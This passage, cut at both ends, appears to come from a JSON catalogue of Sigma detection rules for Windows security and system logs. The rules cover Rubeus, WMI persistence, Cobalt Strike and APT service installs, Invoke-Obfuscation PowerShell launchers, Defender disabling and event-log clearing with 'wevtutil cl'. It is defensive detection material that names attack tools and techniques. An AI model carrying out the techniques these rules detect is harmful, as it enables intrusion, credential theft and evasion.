"medium", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", - "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" - ], - "creation_date": "2019/10/24", - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. 
Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "value": "Local User Creation", - "meta": { - "refs": [ - "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2019/04/18", - "filename": "win_security_user_creation.yml", - "author": "Patrick Bareiss", - "level": "low", - "falsepositive": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", - "uuid": "f63508a0-c809-4435-b3be-ed819394d612", - "value": "Suspicious Driver Loaded By User", - "meta": { - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2019/04/08", - "filename": 
"win_security_user_driver_loaded.yml", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "level": "medium", - "falsepositive": [ - "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", - "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", - "value": "User Logoff Event", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_user_logoff.yml", - "author": "frack113", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the registration of the security event source VSSAudit. 
It would usually trigger when volume shadow copy operations happen.",
- "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b",
- "value": "VSSAudit Security Event Source Registration",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002"
- ],
- "creation_date": "2020/10/20",
- "filename": "win_security_vssaudit_secevent_source_registration.yml",
- "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)",
- "level": "informational",
- "falsepositive": [
- "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe."
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.",
- "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c",
- "value": "T1047 Wmiprvse Wbemcomn DLL Hijack",
- "meta": {
- "refs": [
- "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1047",
- "attack.lateral_movement",
- "attack.t1021.002"
- ],
- "creation_date": "2020/10/12",
- "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml",
- "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.",
- "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88",
- "value": "WMI Persistence - Security",
- "meta": {
- "refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
- "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1546.003"
- ],
- "creation_date": "2017/08/22",
- "filename": "win_security_wmi_persistence.yml",
- "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community",
- "level": "medium",
- "falsepositive": [
- "Unknown (data set is too small; further testing needed)"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL",
- "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86",
- "value": "Microsoft Defender Blocked from Loading Unsigned DLL",
- "meta": {
- "refs": [
- "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002"
- ],
- "creation_date": "2022/08/02",
- "filename": "win_security_mitigations_defender_load_unsigned_dll.yml",
- "author": "Bhabesh Raj",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations",
- "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10",
- "value": "Unsigned Binary Loaded From Suspicious Location",
- "meta": {
- "refs": [
- "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002"
- ],
- "creation_date": "2022/08/03",
- "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.",
- "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f",
- "value": "HybridConnectionManager Service Running",
- "meta": {
- "refs": [
- "https://twitter.com/Cyb3rWard0g/status/1381642789369286662",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1554"
- ],
- "creation_date": "2021/04/12",
- "filename": "win_hybridconnectionmgr_svc_running.yml",
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "level": "high",
- "falsepositive": [
- "Legitimate use of Hybrid Connection Manager via Azure function apps."
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache",
- "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07",
- "value": "Suspicious Application Installed",
- "meta": {
- "refs": [
- "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml"
- ],
- "tags": [
- "attack.execution"
- ],
- "creation_date": "2022/08/14",
- "filename": "win_shell_core_susp_packages_installed.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Packages or applications being legitimately used by users or administrators"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service",
- "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262",
- "value": "Suspicious Rejected SMB Guest Logon From IP",
- "meta": {
- "refs": [
- "https://twitter.com/KevTheHermit/status/1410203844064301056",
- "https://github.com/hhlxf/PrintNightmare",
- "https://github.com/afwu/PrintNightmare",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1110.001"
- ],
- "creation_date": "2021/06/30",
- "filename": "win_susp_failed_guest_logon.yml",
- "author": "Florian Roth, KevTheHermit, fuzzyf10w",
- "level": "medium",
- "falsepositive": [
- "Account fallback reasons (after failed login with specific account)"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects repeated failed (outgoing) attempts to mount a hidden share",
- "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb",
- "value": "Failed Mounting of Hidden Share",
- "meta": {
- "refs": [
- "https://twitter.com/moti_b/status/1032645458634653697",
- "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml"
- ],
- "tags": [
- "attack.t1021.002",
- "attack.lateral_movement"
- ],
- "creation_date": "2022/08/30",
- "filename": "win_susp_failed_hidden_share_mount.yml",
- "author": "Fabian Franz",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrative activity",
- "Faulty scripts"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects application popup reporting a failure of the Sysmon service",
- "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df",
- "value": "Sysmon Crash",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562"
- ],
- "creation_date": "2022/04/26",
- "filename": "win_system_application_sysmon_crash.yml",
- "author": "Tim Shelton",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET",
- "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4",
- "value": "Turla Service Install",
- "meta": {
- "refs": [
- "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0010",
- "attack.t1543.003"
- ],
- "creation_date": "2017/03/31",
- "filename": "win_system_apt_carbonpaper_turla.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018",
- "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92",
- "value": "Chafer Activity - System",
- "meta": {
- "refs": [
- "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ],
- "creation_date": "2018/03/23",
- "filename": "win_system_apt_chafer_mar18_system.yml",
- "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky",
- "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6",
- "value": "StoneDrill Service Install",
- "meta": {
- "refs": [
- "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0064",
- "attack.t1543.003"
- ],
- "creation_date": "2017/03/07",
- "filename": "win_system_apt_stonedrill.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018",
- "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1",
- "value": "Turla PNG Dropper Service",
- "meta": {
- "refs": [
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0010",
- "attack.t1543.003"
- ],
- "creation_date": "2018/11/23",
- "filename": "win_system_apt_turla_service_png.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement",
- "uuid": "5a105d34-05fc-401e-8553-272b45c1522d",
- "value": "CobaltStrike Service Installations - System",
- "meta": {
- "refs": [
- "https://www.sans.org/webcasts/119395",
- "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.privilege_escalation",
- "attack.lateral_movement",
- "attack.t1021.002",
- "attack.t1543.003",
- "attack.t1569.002"
- ],
- "creation_date": "2021/05/26",
- "filename": "win_system_cobaltstrike_service_installs.yml",
- "author": "Florian Roth, Wojciech Lesicki",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled",
- "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680",
- "value": "Windows Defender Threat Detection Disabled - Service",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2020/07/28",
- "filename": "win_system_defender_disabled.yml",
- "author": "J\u00e1n Tren\u010dansk\u00fd, frack113",
- "level": "low",
- "falsepositive": [
- "Administrator actions",
- "Auto updates of Windows Defender causes restarts"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution",
- "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b",
- "value": "Eventlog Cleared",
- "meta": {
- "refs": [
- "https://twitter.com/deviouspolack/status/832535435960209408",
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.001",
- "car.2016-04-002"
- ],
- "creation_date": "2017/01/10",
- "filename": "win_system_eventlog_cleared.yml",
- "author": "Florian Roth",
- "level": "low",
- "falsepositive": [
- "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)",
- "System provisioning (system reset before the golden image creation)"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of smbexec.py tool by detecting a specific service installation",
- "uuid": "52a85084-6989-40c3-8f32-091e12e13f09",
- "value": "smbexec.py Service Installation",
- "meta": {
- "refs": [
- "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.execution",
- "attack.t1021.002",
- "attack.t1569.002"
- ],
- "creation_date": "2018/03/20",
- "filename": "win_system_hack_smbexec.yml",
- "author": "Omer Faruk Celik",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated use of Clip.exe to execute PowerShell",
- "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002",
- "value": "Invoke-Obfuscation CLIP+ Launcher - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/13",
- "filename": "win_system_invoke_obfuscation_clip_services.yml",
- "author": "Jonathan Cheong, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references",
- "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9",
- "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System",
- "meta": {
- "refs": [
- "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027"
- ],
- "creation_date": "2019/11/08",
- "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml",
- "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated use of stdin to execute PowerShell",
- "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002",
- "value": "Invoke-Obfuscation STDIN+ Launcher - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/15",
- "filename": "win_system_invoke_obfuscation_stdin_services.yml",
- "author": "Jonathan Cheong, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated use of Environment Variables to execute PowerShell",
- "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75",
- "value": "Invoke-Obfuscation VAR+ Launcher - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/15",
- "filename": "win_system_invoke_obfuscation_var_services.yml",
- "author": "Jonathan Cheong, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION",
- "uuid": "175997c5-803c-4b08-8bb0-70b099f47595",
- "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/18",
- "filename": "win_system_invoke_obfuscation_via_compress_services.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER",
- "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9",
- "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/18",
- "filename": "win_system_invoke_obfuscation_via_rundll_services.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via Stdin in Scripts",
- "uuid": "487c7524-f892-4054-b263-8a0ace63fc25",
- "value": "Invoke-Obfuscation Via Stdin - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/12",
- "filename": "win_system_invoke_obfuscation_via_stdin_services.yml",
- "author": "Nikita Nazarov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts",
- "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c",
- "value": "Invoke-Obfuscation Via Use Clip - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/09",
- "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml",
- "author": "Nikita Nazarov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via use MSHTA in Scripts",
- "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4",
- "value": "Invoke-Obfuscation Via Use MSHTA - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/09",
- "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml",
- "author": "Nikita Nazarov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts",
- "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b",
- "value": "Invoke-Obfuscation Via Use Rundll32 - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/09",
- "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml",
- "author": "Nikita Nazarov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER",
- "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6",
- "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/13",
- "filename": "win_system_invoke_obfuscation_via_var_services.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation",
- "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee",
- "value": "KDC RC4-HMAC Downgrade CVE-2022-37966",
- "meta": {
- "refs": [
- "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml"
- ],
- "tags": [
- "attack.privilege_escalation"
- ],
- "creation_date": "2022/11/09",
- "filename": "win_system_kdcsvc_rc4_downgrade.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)",
- "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80",
- "value": "KrbRelayUp Service Installation",
- "meta": {
- "refs": [
- "https://github.com/Dec0ne/KrbRelayUp",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1543"
- ],
- "creation_date": "2022/05/11",
